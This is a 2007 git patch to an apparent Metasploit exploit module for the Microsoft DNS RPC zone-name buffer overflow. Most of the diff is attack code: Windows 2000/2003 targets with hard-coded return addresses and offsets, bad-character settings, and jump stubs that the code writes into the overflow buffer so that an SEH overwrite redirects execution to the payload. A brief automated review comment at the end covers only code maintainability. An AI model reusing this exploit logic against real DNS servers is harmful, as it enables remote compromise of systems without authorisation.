From 17082dda1af5195951dafe30e335d23160b3b1fe Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Sun, 15 Apr 2007 21:43:30 +0000
Subject: [PATCH] Almost done...
git-svn-id: file:///home/svn/framework3/trunk@4683 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/dcerpc/msdns_zonename.rb | 47 +++++++++++++++----
 1 file changed, 37 insertions(+), 10 deletions(-)
diff --git a/modules/exploits/windows/dcerpc/msdns_zonename.rb b/modules/exploits/windows/dcerpc/msdns_zonename.rb
index a5d78d784b..8ba3c48726 100644
--- a/modules/exploits/windows/dcerpc/msdns_zonename.rb
+++ b/modules/exploits/windows/dcerpc/msdns_zonename.rb
@@ -37,12 +37,16 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 ['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
 ],
 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
 'Payload' =>
 {
 'Space' => 1024, # The payload doesn't matter, but make_nops() uses these too
- 'BadChars' => "\x00\x5c\x5f\x31\x32\x33\x34\x35\x36\x37",
+ 'BadChars' => "\x00",
 'StackAdjustment' => -3500,
@@ -50,12 +54,26 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 'Platform' => 'win',
 'Targets' =>
 [
+ [ 'Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English',
+ {
+ 'Addresses' => # Offsets must not overlap -4 or +9
+ [
+ [ 1213, 0x75022ac4 ], # Windows 2000 SP0-SP4 ws2help.dll
+ [ 1593, 0x7ffc0960 ], # Windows 2003 SP0 ??? (unreliable?)
+ [ 1633, 0x76a81a60 ], # Windows 2003 SP1-SP2 atl.dll
+ ]
+ }
+ ],
+
 # WS2HELP.DLL
 [ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
-
- # ATL.DLL (checked)
- [ 'Windows 2003 Server SP0 Checked/Debug English', { 'Off' => 1597, 'Ret' => 0x7669b5c5 } ],
-
+
+ # Unknown, probably bad :(
+ [ 'Windows 2003 Server SP0 English', { 'Off' => 1593, 'Ret' => 0x7ffc0960 } ],
+
+ # ATL.DLL (no SafeSEH)
+ [ 'Windows 2003 Server SP1-SP2 English', { 'Off' => 1633, 'Ret' => 0x76a81a60 } ],
+
 ],
 'DisclosureDate' => 'Apr 13 2007'
 ))
@@ -89,13 +107,22 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
 dcerpc_bind(handle)
 print_status("Bound to #{handle} ...")
- txt = Rex::Text.pattern_create(8192)
+ txt = Rex::Text.rand_text_alphanumeric(8192)
 txt[0, payload.encoded.length] = payload.encoded
+ if (target['Addresses'])
+ target['Addresses'].each do |ent|
+ off, ret = ent
+ txt[ off ] = [ret].pack('V')
+ txt[ off - 4, 2] = "\xeb\x06"
+ txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
+ end
+ else
+ off = target['Off']
+ txt[ off ] = [target.ret].pack('V')
+ txt[ off - 4, 2] = "\xeb\x06"
+ txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
+ end
 req = ''
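Review bot: In the 'Targets' hunk the three per-version entries kept below the new combined target restate the same offset/address pairs that its 'Addresses' list already holds, so each pair now lives in two places and the copies can drift; the Windows 2003 SP0 pair is already annotated differently in each (`# Windows 2003 SP0 ??? (unreliable?)` versus `# Unknown, probably bad :(`). If the single-version entries are meant to stay as explicit alternatives to the combined target, a short comment above them saying so, and one consistent caveat on the SP0 pair, would make that intent clear to the next maintainer. The `# Offsets must not overlap -4 or +9` remark on the `'Addresses' =>` line states a constraint on the table that the hunk documents only as a comment, so it should be kept next to the data it applies to rather than on the key line.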